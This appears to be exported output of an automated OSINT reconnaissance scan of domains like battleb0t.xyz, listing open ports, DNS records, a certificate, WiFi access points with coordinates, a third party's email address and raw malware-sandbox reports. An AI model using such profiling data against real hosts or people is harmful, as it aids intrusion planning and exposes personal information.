| 2023-05-12 03:04:46 | Hosting Provider | No | Hosting Provider Identifier | 0 | 0 | 3 | 0 | None | Cloudflare Inc: https://www.cloudflare.com/ | 104.21.71.14 |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 36459 | 185.199.110.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | FNCU-Guest (Net ID: 00:00:0D:09:DE:0C) | 41.8781, -87.6298 |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:2096 | 172.67.135.9 |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.157): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:30 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 64.226.81.43:443 | 64.226.81.43 |
| 2023-05-12 03:01:27 | Web Server | No | Tool - WhatWeb | 0 | 0 | 2 | 0 | None | cloudflare | oldfluid.battleb0t.xyz |
| 2023-05-12 03:11:22 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'Frankfurt am Main', u'security': {u'is_vpn': False}, u'city_geoname_id': 2925533, u'region_geoname_id': 2905330, u'country': u'Germany', u'region': u'Hesse', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'DIGITALOCEAN-ASN', u'isp_name': u'DigitalOcean, LLC', u'organization_name': u'Digital Ocean', u'autonomous_system_number': 14061}, u'continent_code': u'EU', u'currency': {u'currency_name': u'Euros', u'currency_code': u'EUR'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/DE_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/DE_flag.png', u'unicode': u'U+1F1E9 U+1F1EA', u'emoji': u'\U0001f1e9\U0001f1ea'}, u'postal_code': u'60313', u'longitude': 8.6843, u'country_code': u'DE', u'timezone': {u'abbreviation': u'CEST', u'gmt_offset': 2, u'is_dst': True, u'name': u'Europe/Berlin', u'current_time': u'05:11:21'}, u'latitude': 50.1188, u'country_geoname_id': 2921044, u'continent_geoname_id': 6255148, u'country_is_eu': True, u'ip_address': u'207.154.228.169', u'continent': u'Europe', u'region_iso_code': u'HE'} | 207.154.228.169 |
| 2023-05-12 02:55:15 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | Ubuntu Linux | 165.232.113.85 |
| 2023-05-12 02:50:17 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:53:52:1f:22:68:d4:e4:bd:04:c1:ea:37:ae:da:35:a4:38
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:58:43 2023 GMT
Not After : Apr 27 17:58:42 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus: (4096-bit hex value omitted)
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C8:7D:70:94:FD:01:EF:B0:A3:B3:C1:02:F1:32:C9:D5:2D:71:C9:73
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.88): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:45:35 | Affiliate - Internet Name | No | DNS Raw Records | 1 | 0 | 1 | 0 | None | leanna.ns.cloudflare.com | ayhu.xyz |
| 2023-05-12 02:59:53 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | german.l@alliedglobal.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 16, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'WAV-797251.html', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "widevinecdm.dll" as clean (type is "PE32+ executable (DLL) (console) x86-64 for MS Windows")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.22.59.100:443"\n "185.199.111.153:443"\n "13.227.74.44:443"\n "149.154.167.220:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': 
u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8096:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8096:120:WilError_01"\n "Local\\SM0:8096:120:WilError_01"\n "Local\\SM0:8096:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5004:304:WilStaging_02"\n "Local\\SM0:5004:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3416:304:WilStaging_02"\n "Local\\SM0:3416:304:WilStaging_02"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "product_page.js" - Location: [%TEMP%\\8096_1032656472\\product_page.js]- [targetUID: 00000000-00008096]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\8096_1032656472\\edge_tracking_page_validator.js]- [targetUID: 00000000-00008096]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\8096_1032656472\\auto_open_controller.js]- [targetUID: 00000000-00008096]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\8096_1032656472\\shopping_iframe_driver.js]- [targetUID: 00000000-00008096]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\8096_1032656472\\shoppingfre.js]- [targetUID: 00000000-00008096]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\8096_1032656472\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00008096]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\8096_1032656472\\edge_checkout_page_validator.js]- [targetUID: 00000000-00008096]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\8096_1534272233\\adblock_snippet.js]- [targetUID: 00000000-00008096]'}, {u'category': 
u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00008096]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00008096]\n "a369bab2-3926-4626-a576-669ff0c25556.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\a369bab2-3926-4626-a576-669ff0c25556.tmp]- [targetUID: 00000000-00008096]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\manifest.json]- [targetUID: 00000000-00008096]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00008096]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\8096_1032656472\\product_page.js]- [targetUID: 00000000-00008096]\n "eaa46630-4898-435c-8b79-12a101475848.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\eaa46630-4898-435c-8b79-12a101475848.tmp]- [targetUID: 00000000-00008096]\n "widevinecdm.dll.sig" has type "data"- Location: [%TEMP%\\8096_313714830\\_platform_specific\\win_x64\\widevinecdm.dll.sig]- [targetUID: 00000000-00008096]\n 
"77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00008096]\n "cf602cb1-b95f-433b-8ffc-9eebfa799f0b.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\cf602cb1-b95f-433b-8ffc-9eebfa799f0b.tmp]- [targetUID: 00000000-00003416]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\edge_driver.js]- [targetUID: 00000000-00008096]\n "7de6d455-5aa2-4101-812b-70e599317de8.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\7de6d455-5aa2-4101-812b-70e599317de8.tmp]- [targetUID: 00000000-00003416]\n "4feeb93c-9f79-45f0-9ac6-0adffcb5a10a.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\4feeb93c-9f79-45f0-9ac6-0adffcb5a10a.tmp]- [targetUID: 00000000-00008096]\n "deny_domains.list" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Web Notifications Deny List\\1.1.0.0\\deny_domains.list]- [targetUID: 00000000-00008096]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00008096]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00008096]\n "1be98bdb-eeab-4983-9a3f-102d5eb80cfa.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\1be98bdb-eeab-4983-9a3f-102d5eb80cfa.tmp]- [targetUID: 00000000-00008096]\n "safety_tips.pb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\SafetyTips\\2844\\safety_tips.pb]- [targetUID: 
00000000-00008096]\n "6419c6fb-280c-4dec-97ac-cbb742fa50bc.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\6419c6fb-280c-4dec-97ac-cbb742fa50bc.tmp]- [targetUID: 00000000-00008096]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00008096]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "jLP\',\'KDqei\',\'vXqYi\',\'GOqYh\',\'gISTU\',\'n()\\x20\',\'roJBb\',\'FXzcw\',\'__pro\',\'warn\',\'PukFk\',\'EAlzP\',\'YvMmB\',\'iiLHY\',\'tQrEe\',\'mGJfV\',\'strin\',\'pbBLV\',\'KlDNI\',\'nbsJn\',\'kVpKR\',\'BiHjg\',\'FNmxz\',\'sWuxZ\',\'ZOmpK\',\'om%2f\',\'FpgMT\',\'sjuIm\',\'style\',\'round\',\'EuVvW\',\'Qydgv\',\'s"\n Heuristic match: "api.telegram.org"\n Heuristic match: "l@allledglobal.com"\n Heuristic match: "german.l@alliedglobal.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, 
u'type': 7, u'description': u'Connection was make using TLSv1.2 [tls.handshake.version: 0x00000303]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': |
| 2023-05-12 03:16:19 | Physical Location | No | ipapi.co | 1 | 0 | 2 | 0 | None | London, England, ENG, United Kingdom, GB | 2a06:98c1:3121::1 |
| 2023-05-12 03:09:41 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 123.48.229.35.bc.googleusercontent.com | 35.229.48.123 |
| 2023-05-12 02:57:58 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://wifispeedtest.run/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b20_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2848"\n "IsoScope_b20_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_b20_IESQMMUTEX_0_303"\n "IsoScope_b20_IESQMMUTEX_0_331"\n "UpdatingNewTabPageData"\n "IsoScope_b20_ConnHashTable<2848>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_b20_IE_EarlyTabStart_0xbb4_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"wifispeedtest.run"'}, {u'category': u'General', 
u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"wifispeedtest.run"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:80"\n "34.148.97.127:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarB619.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabB618.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 62397 bytes 1 file"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "LKV79Z5R.txt" - 
Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LKV79Z5R.txt]- [targetUID: 00000000-00002848]\n Dropped file: "I7UUS2FD.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\I7UUS2FD.txt]- [targetUID: 00000000-00002848]\n Dropped file: "DU53BF1Z.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DU53BF1Z.txt]- [targetUID: 00000000-00002848]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00002848]\n "_C99CEF31-40DD-11ED-ACE7-08002742885A_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003528]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "_D40FFDA2-40DD-11ED-ACE7-08002742885A_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002848]\n "CabB618.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"- Location: [%TEMP%\\CabB618.tmp]- [targetUID: 00000000-00003528]\n "89E04DD615224FC07C7804BBADCE34B2" has type "data"- Location: 
[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\89E04DD615224FC07C7804BBADCE34B2]- [targetUID: 00000000-00003528]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002848]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00002848]\n "TarB619.tmp" has type "data"- Location: [%TEMP%\\TarB619.tmp]- [targetUID: 00000000-00003528]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "ZTHQHHIZ.txt" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\ZTHQHHIZ.txt]- [targetUID: 00000000-00003528]\n "~DF48C297BD3AF92F27.TMP" has type "data"- Location: [%TEMP%\\~DF48C297BD3AF92F27.TMP]- [targetUID: 00000000-00002848]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 
1\nConnection: Keep-Alive\nHost: wifispeedtest.run"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://wifispeedtest.run/"\n Pattern match: "http://wifispeedtest.run"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'1/88 Antivirus vendors marked sample as malicious (1% detection rate)'}], u'threat_level': 1, u'size': None, u'job_id': u'6337364c4440b66f39537654', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Encrypted Channel', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer 
Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identif | 34.148.97.127 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | danny (Net ID: 00:01:E3:02:5D:60) | 50.1188, 8.6843 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Eminent (Net ID: 00:14:5C:88:50:78) | 50.8897, 6.0563 |
| 2023-05-12 03:24:21 | HTTP Headers | No | Web Spider | 10 | 0 | 3 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} | https://ayhu.xyz/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["7c5ad9968f0b1cf4-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 188.114.97.1 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:01:24:F2:17:BC) | 37.780462,-122.390564 |
| 2023-05-12 02:46:18 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 2 | 0 | None | Freedom of speech in the United States | skip.ns.cloudflare.com |
| 2023-05-12 03:23:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.6:80 | 188.114.96.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/random_4.png | https://funny.battleb0t.xyz/ |
